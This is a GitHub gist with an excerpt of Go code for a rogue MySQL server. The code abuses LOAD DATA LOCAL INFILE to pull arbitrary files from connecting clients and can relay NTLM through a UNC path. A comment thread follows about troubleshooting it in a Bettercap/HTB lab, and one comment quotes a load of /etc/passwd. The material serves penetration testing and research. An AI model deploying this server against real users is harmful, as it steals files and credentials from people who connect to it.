Skip to content

Instantly share code, notes, and snippets.

Last active May 4, 2020 19:37
Show Gist options
  • Save bmaia/adc503231ffff19a77aaf0c7abd2e895 to your computer and use it in GitHub Desktop.
Save bmaia/adc503231ffff19a77aaf0c7abd2e895 to your computer and use it in GitHub Desktop.
for mysql.Running() {
// tcp listener
conn, err := mysql.listener.AcceptTCP()
if err != nil {
log.Warning("Error while accepting TCP connection: %s", err)
// send the mysql greeting
// read the incoming responses and retrieve infile
// TODO: include binary support and files > 16kb
b := make([]byte, 16384)
// parse client capabilities and validate connection
// TODO: parse mysql connections properly and
// display additional connection attributes
clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8)))
if len(clientCapabilities) == 16 {
remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]
log.Info("MySQL connection from: %s", remoteAddress)
loadData := string(clientCapabilities[8])
log.Info("Can Use LOAD DATA LOCAL: %s", loadData)
username := bytes.Split(b[36:], []byte{0})[0]
log.Info("MySQL Login Request Username: %s", username)
// send initial responseOK
infileLen, err := bufio.NewReader(conn).Read(b)
if err != nil {
log.Warning("Error while reading buffer: %s", err)
// check if the infile is an UNC path
if strings.HasPrefix(mysql.infile, "\\") {
log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
} else {
// print the infile content, ignore mysql protocol headers
// TODO: include binary support and output to a file
log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4])
// send additional response
defer conn.Close()
Copy link

guanicoe commented May 4, 2020

are the (...) on line 55 (en d) on purpose?

Copy link

bmaia commented May 4, 2020

are the (...) on line 55 (en d) on purpose?

Yes, this is just a code snippet for the blogpost here ->

The full source code for the server was merged into Bettercap, you can find it here:

Copy link

guanicoe commented May 4, 2020

@bmaia I did not expect such swift response. I did check the code in bettercap as saw it was indeed included. I'm about to test your tool on htb thanks ;)

Copy link

guanicoe commented May 4, 2020

Hey again, I'm having an issue with this tool related to bettercap/bettercap#572 . Basically I get [sys.log] [war] mysql.server unpexpected buffer size 4 error (I actually also corrected the typo in the main code)
I don't really know what it means nor how to troubleshoot.



$mariadb -V
mariadb  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
$mysql -V
mysql  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

Do you think you could help?

Copy link

bmaia commented May 4, 2020

You can try to use other Rogue MySQL clients like the one below:

The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD INDATA, check the mysql packets and try to replay them (see the snippets below for an example):

load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

The post below is a good (and more recent) reference:

Copy link

guanicoe commented May 4, 2020

ok i'll give it a try. I did first try but it spat a lot of exceptions and reading your post I thought I'd give bettercap a try as everything was integrated

error: uncaptured python exception, closing channel <__main__.http_request_handler connected at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/|read|83] [/usr/lib/python2.7/|handle_read_event|449] [/usr/lib/python2.7/|handle_read|147] [|found_terminator|184])

Copy link

guanicoe commented May 4, 2020

Just to let you know that your module works great, and that i was to blame.The error came from a malformed sql query

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment